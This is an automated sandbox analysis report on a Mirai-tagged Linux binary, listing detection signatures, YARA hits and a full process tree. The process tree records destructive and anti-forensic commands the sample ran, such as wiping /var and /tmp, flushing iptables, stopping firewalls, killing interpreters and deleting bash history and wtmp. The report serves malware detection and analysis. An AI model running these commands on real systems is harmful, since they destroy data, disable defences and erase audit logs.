Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Linux Analysis Report x86

Overview

General Information

Sample Name:x86
Analysis ID:519694
MD5:776097f22f49b5f4c467e2afdee63009
SHA1:540cb7d95922f31459afb94d6b37827b41bf677e
SHA256:c817429ed299ec43b67bf47aad81081496d8ab45afe231890bdb564f4bf4db7d
Tags:Mirai
Infos:

Most interesting Screenshot:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Deletes all firewall rules
Connects to many ports of the same IP (likely port scanning)
Sample deletes itself
Sample is packed with UPX
Uses known network protocols on non-standard ports
Deletes security-related log files
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:519694
Start date:11.11.2021
Start time:03:02:50
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 7s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:x86
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.spre.troj.evad.lin@0/9@2/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • x86 (PID: 5245, Parent: 5120, MD5: 776097f22f49b5f4c467e2afdee63009) Arguments: /tmp/x86
    • x86 New Fork (PID: 5246, Parent: 5245)
    • x86 New Fork (PID: 5247, Parent: 5245)
    • x86 New Fork (PID: 5249, Parent: 5245)
    • x86 New Fork (PID: 5250, Parent: 5245)
    • x86 New Fork (PID: 5251, Parent: 5245)
    • x86 New Fork (PID: 5252, Parent: 5245)
      • x86 New Fork (PID: 5253, Parent: 5252)
      • x86 New Fork (PID: 5254, Parent: 5252)
        • x86 New Fork (PID: 5255, Parent: 5254)
          • x86 New Fork (PID: 5256, Parent: 5255)
          • sh (PID: 5256, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
            • sh New Fork (PID: 5257, Parent: 5256)
            • rm (PID: 5257, Parent: 5256, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /tmp/x86 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
          • x86 New Fork (PID: 5265, Parent: 5255)
          • sh (PID: 5265, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /var/log/wtmp"
            • sh New Fork (PID: 5266, Parent: 5265)
            • rm (PID: 5266, Parent: 5265, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/wtmp
          • x86 New Fork (PID: 5267, Parent: 5255)
          • sh (PID: 5267, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/*"
            • sh New Fork (PID: 5268, Parent: 5267)
            • rm (PID: 5268, Parent: 5267, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
          • x86 New Fork (PID: 5269, Parent: 5255)
          • sh (PID: 5269, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /bin/netstat"
            • sh New Fork (PID: 5270, Parent: 5269)
            • rm (PID: 5270, Parent: 5269, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /bin/netstat
          • x86 New Fork (PID: 5271, Parent: 5255)
          • sh (PID: 5271, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F"
            • sh New Fork (PID: 5272, Parent: 5271)
            • iptables (PID: 5272, Parent: 5271, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
          • x86 New Fork (PID: 5276, Parent: 5255)
          • sh (PID: 5276, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 busybox"
            • sh New Fork (PID: 5278, Parent: 5276)
            • pkill (PID: 5278, Parent: 5276, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
          • x86 New Fork (PID: 5283, Parent: 5255)
          • sh (PID: 5283, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 perl"
            • sh New Fork (PID: 5284, Parent: 5283)
            • pkill (PID: 5284, Parent: 5283, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
          • x86 New Fork (PID: 5285, Parent: 5255)
          • sh (PID: 5285, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 python"
            • sh New Fork (PID: 5286, Parent: 5285)
            • pkill (PID: 5286, Parent: 5285, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
          • x86 New Fork (PID: 5289, Parent: 5255)
          • sh (PID: 5289, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables stop"
            • sh New Fork (PID: 5290, Parent: 5289)
            • service (PID: 5290, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
              • service New Fork (PID: 5292, Parent: 5290)
              • basename (PID: 5292, Parent: 5290, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5293, Parent: 5290)
              • basename (PID: 5293, Parent: 5290, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5294, Parent: 5290)
              • systemctl (PID: 5294, Parent: 5290, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5295, Parent: 5290)
                • service New Fork (PID: 5296, Parent: 5295)
                • systemctl (PID: 5296, Parent: 5295, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5297, Parent: 5295)
                • sed (PID: 5297, Parent: 5295, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5290, Parent: 5289, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
          • x86 New Fork (PID: 5300, Parent: 5255)
          • sh (PID: 5300, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/iptables -F; /sbin/iptables -X"
            • sh New Fork (PID: 5301, Parent: 5300)
            • iptables (PID: 5301, Parent: 5300, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
            • sh New Fork (PID: 5302, Parent: 5300)
            • iptables (PID: 5302, Parent: 5300, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
          • x86 New Fork (PID: 5303, Parent: 5255)
          • sh (PID: 5303, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service firewalld stop"
            • sh New Fork (PID: 5304, Parent: 5303)
            • service (PID: 5304, Parent: 5303, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewalld stop
              • service New Fork (PID: 5305, Parent: 5304)
              • basename (PID: 5305, Parent: 5304, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5306, Parent: 5304)
              • basename (PID: 5306, Parent: 5304, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5307, Parent: 5304)
              • systemctl (PID: 5307, Parent: 5304, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5308, Parent: 5304)
                • service New Fork (PID: 5309, Parent: 5308)
                • systemctl (PID: 5309, Parent: 5308, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5310, Parent: 5308)
                • sed (PID: 5310, Parent: 5308, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5304, Parent: 5303, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewalld.service
          • x86 New Fork (PID: 5311, Parent: 5255)
          • sh (PID: 5311, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"
            • sh New Fork (PID: 5312, Parent: 5311)
            • rm (PID: 5312, Parent: 5311, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
          • x86 New Fork (PID: 5313, Parent: 5255)
          • sh (PID: 5313, Parent: 5255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c"
  • systemd New Fork (PID: 5337, Parent: 1)
  • whoopsie (PID: 5337, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5367, Parent: 1)
  • sshd (PID: 5367, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5368, Parent: 1)
  • sshd (PID: 5368, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • gdm3 New Fork (PID: 5371, Parent: 1320)
  • Default (PID: 5371, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5372, Parent: 1320)
  • Default (PID: 5372, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5375, Parent: 1)
  • accounts-daemon (PID: 5375, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
  • systemd New Fork (PID: 5410, Parent: 1860)
  • pulseaudio (PID: 5410, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5435, Parent: 1)
  • gpu-manager (PID: 5435, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5436, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5437, Parent: 5436)
      • grep (PID: 5437, Parent: 5436, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5438, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5439, Parent: 5438)
      • grep (PID: 5439, Parent: 5438, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5440, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5441, Parent: 5440)
      • grep (PID: 5441, Parent: 5440, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5442, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5443, Parent: 5442)
      • grep (PID: 5443, Parent: 5442, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5444, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5445, Parent: 5444)
      • grep (PID: 5445, Parent: 5444, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5446, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5447, Parent: 5446)
      • grep (PID: 5447, Parent: 5446, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5451, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5452, Parent: 5451)
      • grep (PID: 5452, Parent: 5451, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5453, Parent: 5435, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5454, Parent: 5453)
      • grep (PID: 5454, Parent: 5453, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5455, Parent: 1)
  • generate-config (PID: 5455, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5456, Parent: 5455, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5457, Parent: 1)
  • gdm-wait-for-drm (PID: 5457, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • fusermount (PID: 5462, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5475, Parent: 1)
  • systemd-user-runtime-dir (PID: 5475, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 1000
  • systemd New Fork (PID: 5502, Parent: 1)
  • gdm3 (PID: 5502, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • systemd New Fork (PID: 5553, Parent: 1)
  • gpu-manager (PID: 5553, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5554, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5555, Parent: 5554)
      • grep (PID: 5555, Parent: 5554, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5556, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5557, Parent: 5556)
      • grep (PID: 5557, Parent: 5556, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5558, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5559, Parent: 5558)
      • grep (PID: 5559, Parent: 5558, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5560, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5561, Parent: 5560)
      • grep (PID: 5561, Parent: 5560, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5562, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5563, Parent: 5562)
      • grep (PID: 5563, Parent: 5562, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5564, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5565, Parent: 5564)
      • grep (PID: 5565, Parent: 5564, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5566, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5567, Parent: 5566)
      • grep (PID: 5567, Parent: 5566, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5568, Parent: 5553, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5569, Parent: 5568)
      • grep (PID: 5569, Parent: 5568, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5570, Parent: 1)
  • generate-config (PID: 5570, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5571, Parent: 5570, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5574, Parent: 1)
  • gdm-wait-for-drm (PID: 5574, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5582, Parent: 1)
  • gdm3 (PID: 5582, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
x86SUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0xa10d:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0xa0b9:$s2: $Id: UPX
  • 0xa06a:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: x86Virustotal: Detection: 35%Perma Link
    Source: x86ReversingLabs: Detection: 34%
